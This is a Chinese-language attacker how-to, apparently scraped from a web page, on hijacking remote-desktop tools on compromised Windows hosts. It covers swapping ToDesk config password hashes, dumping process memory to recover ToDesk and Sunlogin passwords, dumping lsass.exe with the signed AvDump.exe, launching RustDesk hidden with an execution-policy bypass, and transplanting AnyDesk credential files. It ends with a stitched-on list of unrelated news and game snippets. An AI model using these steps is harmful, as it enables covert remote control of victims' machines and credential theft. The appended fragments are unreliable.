在平时打web或者打内网时难免遇到一种情况,就是需要以当前用户身份,通过远程桌面的形式操控主机。已达到退杀软、操控聊天软件以及其他需要交互式的操作,这个时候就需要借助远程桌面软件来操控目标机。
NO.1 Todesk根据目标软件安装情况有以下两种利用方法
1.目标机已有完整版todesk。1)改配置文件。
(相关资料图)
老版本可替换至本地查看密码(此法在最近更新的几个版本中已经失效),新版本只可更改密码。
改C:\Program Files (x86)\ToDesk下conf.ini文件tempAuthPassEx字段
tga5h42d
b219c2a861e176d319b0a4e0463896d4af2a02ed7bc88da794541701b46f1af2fc4a9864ae00772cc8d924a801bdaaa3b47fbd2fa637ac4b
65tu07zr
11a48a2981bfda260f2f1a890a97b2ed9fcb9b48a262d20e3a68f6c56d6790cd910e1618a7747df448922b0cfe16c284728d28864923d3c8
kill进程重启即可。
2)内存读密码
userInfo.json
和devlist_xx.json
文件有userid(连接码)
dump内存,搜索连接码,上下几行会有密码
4.3.3以下临时密码为6位数字
2.目标机无todest,安装官方精简版dump内存 仅测试4.3.3.0运行精简版(需bypassUAC),dump子进程(主进程为system权限)
AvDump.exe是Avast杀毒软件中自带的一个程序,可用于转储指定进程(lsass.exe)内存数据,它带有Avast杀软数字签名。
AvDump.exe --pid 954 --exception_ptr 0 --thread_id 0 --dump_level 1 --dump_file lsass.dmp
可通过定位被控端版本 4.3.3.0 、主机名、公网ip、系统版本(更准确),来找到相应位置。
*shell快速提取,不一定有效,密码可能在输出的前后两行
设置utf-8
CHCP 65001
1)连接码
shell findstr "20220829" C:\Users\Public\tod.dmp 时间定位
shell findstr "ip地址" C:\Users\Public\tod.dmp ip定位
2)连接密码
主要靠系统版本号定位,具体看连接码定位字符串显示的版本号
shell findstr "19044" C:\Users\Public\tod.dmp
通常为8位数,数字字母混合
NO.2 Rustdesk单机版,无需绕UAC,但部分软件操作会提示UAC。配置文件地址C:\Users\username\AppData\Roaming\RustDesk\config\RustDesk.toml
使用powershell可以无窗口执行powershell-executionPolicy bypass Start-Process -WindowStyle hidden -FilePath "C:/user/rust.exe"
第一次运行rustdesk会生成配置文件,然后结束进程taskkill/f /t /im rust.exe
在配置文件中添加密码,6位数密码
在内网还可配置直连功能RustDesk2.toml
[options]direct-server="Y"direct-access-port="8443"
NO.3 Anydesk复制本地C:\Users\guoguang\AppData\Roaming\AnyDesk 下四个文件到远程主机上删除本地文件,重启开启连接
NO.4 向日葵自从向日葵12.5版本后,原encry_pwd和fastcode字段已经不在配置文件config.ini和注册表HKEY_USERS.DEFAULT\Software\Oray\SunLogin\SunloginClient\SunloginInfo内解决方案一根据分析,上述字段移动至C:\ProgramData\Oray\SunloginClient\sys_config.ini中此配置文件默认需要SYSTEM权限才可以读取提权后拿到id和加密后的密码,经测试算法没变,通过现有项目解密即可 https://github.com/wafinfo/Sunflower_get_Password解决方案二通过dump内存的方式匹配明文字符串获取,参考: https://red.rizhan.icu/?thread-176.htmid正则为k[0-9]{8,}密码正则为>[a-z0-9]{6},每次刷新后密码的均会保存在内存中
标签:
在平时打web或者打内网时难免遇到一种情况,就是需要以当前用户身份,通过远程桌面的形式操控主机。已达到
1、虹桥机场TT2收费标准不一样,自己比对一下,参考吧!收费标准:虹桥T1航站楼首1小时内7元 小时超1小时
记者陈娴5月30日,随着深交所江苏基地全面注册制培训会、徐州路演中心投融资路演同步举行,2023年深交所江
崩坏星穹铁道的幻胧周本掉落什么材料可能很多玩家还不太清楚。下面小编给大家带来崩坏星穹铁道幻胧周本掉落
1、一:《讲真的》《讲真的》是由内地唱作人-李袁杰和纯美女声-曾惜共同演绎的歌曲《讲真的》虐心上线,这首
引导孩子们培养正确的消费观和金钱观,近日工商银行无锡分行营业部联合无锡通德桥幼儿园举办“小小银行...
场内期权的特征有哪些?怎么分析?首先,场内期权是指在交易所内进行交易的一种金融工具,是指以股票、
想必现在有很多小伙伴对于能见度低于多少离开高速方面的知识都比较想要了解,那么今天小好小编就为大家收集
虽然长春市区人口比沈阳少200多万,但是市区规模已经追上了沈阳,大连,市区,长春市,哈尔滨,沈阳少,城区常住人口
1、“安全生产宣传咨询日”活动是全国“安全生产月”活动的一项重要内容,2002——2013年,“安全生产宣...
1、周工作总结转眼我来中心工作已经两星期了,这两星期是我人生旅途中的重要一程。2、期间在领导及同事们的
ATFX动态产品及服务是支撑一家企业能够走得长远的动力丰富的产品阵容不仅能够满足各类客户的需求而且也能提
随着电商行业的不断发展,越来越多的企业开始进入电商市场,其中许多企业选择在1688平台上开设店铺。然而,
5月30日,“学习二十大,争做好队员”荣成市第一批新队员入队仪式暨分批入队示范活动在荣成市府新小学举...
新管理办法在动力电池回收利用某些方面加强以法规来约束,而此前暂行办法在这些方面主要是采取建议的形式。
宏观产经商务部:5月31日,商务部部长王文涛会见特斯拉公司首席执行官马斯克。双方就中美经贸合作、特斯拉
今日,前SIE圣莫妮卡工作室艺术总监RafGrassetti在推特上发文宣布,将离开《战神》工作室,加入网飞在南加
CET一般指大学英语四六级考试。英语四六级考试是教育部主管的一项全国性的英语考试,其目的是对大学生的实
读特客户端·深圳新闻网2023年6月1日讯(晶报记者余梓宏)深圳国际会展中心9号馆内,有一个造型非常具有科
1、灭蚊灯灭蚊效果是有的,但效果很一般,因其对蚊虫的吸引力很弱。2、现在市场上也有改良的灭蚊灯,它们可
X 关闭
X 关闭